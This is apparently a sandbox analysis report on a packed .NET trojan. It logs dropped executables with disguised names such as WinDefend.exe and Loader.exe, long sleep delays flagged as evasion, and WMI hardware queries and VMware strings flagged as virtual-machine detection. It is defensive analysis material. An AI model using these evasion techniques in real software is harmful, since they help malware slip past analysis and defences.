Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -598704s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99871s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99755s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99633s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99516s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99401s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99285s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99168s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99053s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98931s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98815s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99931s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99815s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99684s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99564s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99435s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99314s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99193s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98958s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98822s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98706s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98573s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98459s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99960s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99852s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99708s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99591s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99469s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99351s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99236s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99105s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98984s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -98872s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99901s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99753s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -99615s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680	Thread sleep count: 9149 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep count: 575 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4276	Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908	Thread sleep count: 8305 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852	Thread sleep count: 606 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5536	Thread sleep time: -922337203685477s >= -30000s

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\Loader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\Loader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\Client.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Loader.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Loader.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Loaader.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599524	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598937	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598826	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598704	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598556	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598433	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598323	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598090	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597745	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597320	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596948	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596604	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596270	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 595684	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99866	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99745	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99628	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99500	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99389	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99280	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99171	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99062	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98937	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99953	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99793	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99647	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99343	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99210	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98984	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98874	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 593075	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592785	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592635	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592507	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592367	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592249	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592031	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 591922	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 591789	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Loader.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Loader.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599344
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599234
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599125
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599015
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598906
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598797
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99875
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99766
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99641
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99531
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99422
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99312
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99201
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99094
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98978
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98830
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98672
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99887
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99781
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99521
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99406
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99297
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 97828
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 97670
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 97551
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 97316
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99859
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99746
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99640
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99421
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99203
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99079
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98906
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98750
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99936
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99742
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99561
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99319
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99180
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99060
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98943
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98804
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 591993
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99876
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99758
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599877
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599738
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599612
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599476
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599360
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599217
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599110
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598982
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598845
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598704
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99871
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99755
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99633
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99516
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99401
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99285
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99168
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99053
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98931
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98815
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99931
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99815
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99684
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99564
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99435
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99314
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99193
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99062
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98958
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98822
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98706
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98573
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98459
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99960
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99852
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99708
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99591
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99469
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99351
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99236
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99105
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98984
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98872
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99901
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99753
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99615
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: Amcache.hve.30.dr	Binary or memory string: VMware
Source: Amcache.hve.30.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.30.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.30.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.30.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.30.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.30.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.30.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: WinDefend.exe, 00000004.00000002.3251120364.0000000001167000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000014.00000002.2728713253.000000001B22B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000014.00000002.2747981173.000000001B573000.00000004.00000020.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3526000868.000000001B9A4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.30.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003477000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003489000.00000004.00000800.00020000.00000000.sdmp, Info.txt.21.dr	Binary or memory string: VirtualMachine: False
Source: Amcache.hve.30.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VirtualMachine:
Source: Amcache.hve.30.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: WinDefend.exe, 0000001F.00000002.3250841388.0000000000E52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
Source: Amcache.hve.30.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: WinDefend.exe, 00000004.00000002.3251120364.0000000001167000.00000004.00000020.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3250933723.0000000001203000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000019.00000002.2255759689.0000015CBE79E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: A2e$ConvertByrefToPtrVen_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRo
Source: Amcache.hve.30.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.30.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.30.dr	Binary or memory string: vmci.syshbin`
Source: Loaader.exe.3.dr	Binary or memory string: vmware
Source: Amcache.hve.30.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.30.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.30.dr	Binary or memory string: VMware20,1
Source: Infected.exe, 00000003.00000002.2047247573.000000001AD7C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91ef
Source: Amcache.hve.30.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.30.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.30.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.30.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.30.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.30.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
